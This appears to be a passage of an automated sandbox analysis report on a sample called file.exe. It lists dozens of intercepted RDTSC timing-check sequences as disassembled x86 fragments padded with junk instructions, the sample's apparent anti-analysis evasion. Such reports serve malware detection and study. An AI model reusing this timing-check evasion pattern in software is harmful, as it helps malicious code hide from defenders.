                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6023B second address: A60264 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F0C44D4E186h 0x00000010 jmp 00007F0C44D4E199h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60552 second address: A6055E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0C44E7DD66h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6055E second address: A60577 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C44D4E193h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60577 second address: A6057B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A606CD second address: A606DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44D4E18Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60828 second address: A60859 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F0C44E7DD66h 0x00000009 jmp 00007F0C44E7DD73h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0C44E7DD6Ah 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60859 second address: A6085D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6085D second address: A60878 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F0C44E7DD75h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60878 second address: A60884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F0C44D4E186h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A609DD second address: A609E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A609E1 second address: A609EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A609EC second address: A609F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A609F4 second address: A60A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44D4E18Bh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F0C44D4E195h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D3E2 second address: A0D3E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D3E7 second address: A0D3F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0C44D4E18Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D3F6 second address: A0D431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edx, edi 0x0000000c mov ebx, dword ptr [ebp+1246E53Ah] 0x00000012 mov edx, dword ptr [ebp+122D2B8Bh] 0x00000018 add eax, ebx 0x0000001a mov dword ptr [ebp+122D1BC1h], edi 0x00000020 push eax 0x00000021 push edi 0x00000022 pushad 0x00000023 jmp 00007F0C44E7DD76h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D431 second address: A0D49E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F0C44D4E188h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 stc 0x00000024 push 00000004h 0x00000026 push 00000000h 0x00000028 push ecx 0x00000029 call 00007F0C44D4E188h 0x0000002e pop ecx 0x0000002f mov dword ptr [esp+04h], ecx 0x00000033 add dword ptr [esp+04h], 00000018h 0x0000003b inc ecx 0x0000003c push ecx 0x0000003d ret 0x0000003e pop ecx 0x0000003f ret 0x00000040 stc 0x00000041 mov ecx, dword ptr [ebp+122D2DE7h] 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b jmp 00007F0C44D4E18Eh 0x00000050 push esi 0x00000051 pop esi 0x00000052 popad 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60B6F second address: A60B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007F0C44E7DD6Eh 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007F0C44E7DD66h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A61751 second address: A61757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A61757 second address: A61771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jno 00007F0C44E7DD75h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64915 second address: A6491B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6491B second address: A64924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64924 second address: A6492A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6492A second address: A64930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64241 second address: A64245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64245 second address: A6424F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0C44C1C9E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69873 second address: A698AF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 jg 00007F0C44CFD9A6h 0x0000000b pop esi 0x0000000c jmp 00007F0C44CFD9AEh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F0C44CFD9B7h 0x0000001b jp 00007F0C44CFD9A6h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69ED9 second address: A69EFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44C1C9F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jc 00007F0C44C1C9EEh 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69EFA second address: A69F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6A169 second address: A6A179 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0C44C1C9E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6A179 second address: A6A17D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6A47E second address: A6A482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6A482 second address: A6A492 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnp 00007F0C44CFD9A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6A492 second address: A6A498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6A498 second address: A6A49C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6ACB8 second address: A6ACDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44C1C9F9h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6B2A9 second address: A6B2C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C44CFD9B5h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6B2C2 second address: A6B2D6 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0C44C1C9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F0C44C1C9E6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70129 second address: A70139 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44CFD9AAh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70139 second address: A7013F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7013F second address: A70143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70143 second address: A70149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6F954 second address: A6F97B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44CFD9ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F0C44CFD9D2h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0C44CFD9B0h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6F97B second address: A6F981 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B2EB second address: A7B2F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0C44CFD9A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B2F5 second address: A7B306 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F0C44C1C9ECh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B306 second address: A7B30A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B30A second address: A7B316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F0C44C1C9E6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B316 second address: A7B323 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0C44CFD9A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BBA4 second address: A7BBD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44C1C9F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007F0C44C1C9EEh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BBD3 second address: A7BBD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BBD9 second address: A7BBEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007F0C44C1C9EAh 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BBEC second address: A7BC0B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0C44CFD9A8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F0C44CFD9AEh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BD3B second address: A7BD41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BD41 second address: A7BD55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F0C44CFD9B2h 0x0000000c jnc 00007F0C44CFD9A6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7CB60 second address: A7CB73 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0C44C1C9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jg 00007F0C44C1C9E6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7CB73 second address: A7CB78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7CB78 second address: A7CB7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7AA5C second address: A7AA76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44CFD9B6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7AA76 second address: A7AA88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F0C44C1C9E8h 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8174F second address: A81753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81753 second address: A81771 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44C1C9EAh 0x00000007 jnp 00007F0C44C1C9E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jl 00007F0C44C1C9E6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81771 second address: A81775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81775 second address: A8177F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0C44C1C9E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8177F second address: A81785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81785 second address: A817A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44C1C9F5h 0x00000007 jo 00007F0C44C1C9EEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A847F2 second address: A847F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A847F8 second address: A84806 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jo 00007F0C44C1C9E6h 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A844D0 second address: A844E5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0C44CFD9AFh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A844E5 second address: A844F0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007F0C44C1C9E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A844F0 second address: A84506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F0C44CFD9AAh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A84506 second address: A8450A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8450A second address: A84510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A84510 second address: A8452A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0C44C1C9ECh 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F0C44C1C9E6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A85E48 second address: A85E59 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jp 00007F0C44CFD9A6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A926A5 second address: A926C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F0C44C1C9F8h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A926C7 second address: A926D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F0C44CFD9A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A94E89 second address: A94E8E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA46C4 second address: AA46CA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA46CA second address: AA46DC instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0C44C1C9ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAD545 second address: AAD549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAD549 second address: AAD551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAD551 second address: AAD557 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAD557 second address: AAD55B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AABDBB second address: AABDEF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0C44CFD9A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F0C44CFD9B3h 0x00000010 jmp 00007F0C44CFD9AEh 0x00000015 pushad 0x00000016 ja 00007F0C44CFD9A6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AABDEF second address: AABDF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AABDF5 second address: AABE16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F0C44CFD9B3h 0x0000000e push ebx 0x0000000f push esi 0x00000010 pop esi 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AABE16 second address: AABE3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0C44C1C9ECh 0x0000000a pushad 0x0000000b popad 0x0000000c jnl 00007F0C44C1C9E6h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0C44C1C9EAh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAC112 second address: AAC11A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAC248 second address: AAC24C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAC4EE second address: AAC50F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0C44CFD9A6h 0x00000008 jmp 00007F0C44CFD9B7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAC83D second address: AAC846 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAC846 second address: AAC870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44CFD9AEh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0C44CFD9B1h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAC870 second address: AAC874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAC874 second address: AAC878 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2E44 second address: AB2E4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2E4A second address: AB2E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44CFD9ABh 0x00000009 rdtsc
